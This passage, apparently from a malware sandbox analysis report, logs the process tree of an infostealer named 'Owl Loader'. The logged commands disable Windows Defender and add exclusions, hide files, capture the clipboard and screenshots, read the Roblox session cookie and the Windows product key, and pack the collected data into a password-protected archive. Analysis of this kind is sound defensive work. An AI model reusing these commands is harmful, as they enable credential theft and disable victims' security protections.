      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4368
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3140
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2028
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Owl Loader.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4352
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Owl Loader.exe"
      4⤵
      Views/modifies file attributes
      PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:228
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2852
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1536
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4508
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5000
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4140
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2956
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:2204
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3092
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lrtnuz4b\lrtnuz4b.cmdline"
        5⤵
        
        PID:3572
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC246.tmp" "c:\Users\Admin\AppData\Local\Temp\lrtnuz4b\CSC6C16BEC2C4F143859AD99CFAEE91B148.TMP"
        6⤵
        
        PID:4148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4524
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1768
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1296
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2664
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:540
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3140
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1396
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2028
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4972
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28362\rar.exe a -r -hp"Trolgang77" "C:\Users\Admin\AppData\Local\Temp\PWluV.zip" *"
    3⤵
    PID:5028
  - - C:\Users\Admin\AppData\Local\Temp\_MEI28362\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI28362\rar.exe a -r -hp"Trolgang77" "C:\Users\Admin\AppData\Local\Temp\PWluV.zip" *
      4⤵
      Executes dropped EXE
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3652
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Owl Loader.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2960
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3888

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4148

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3864

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr" /S
1⤵
- Executes dropped EXE
PID:1448
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr
  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr" /S
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    PID:4020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:3140
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3632
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:4324
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:4480
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
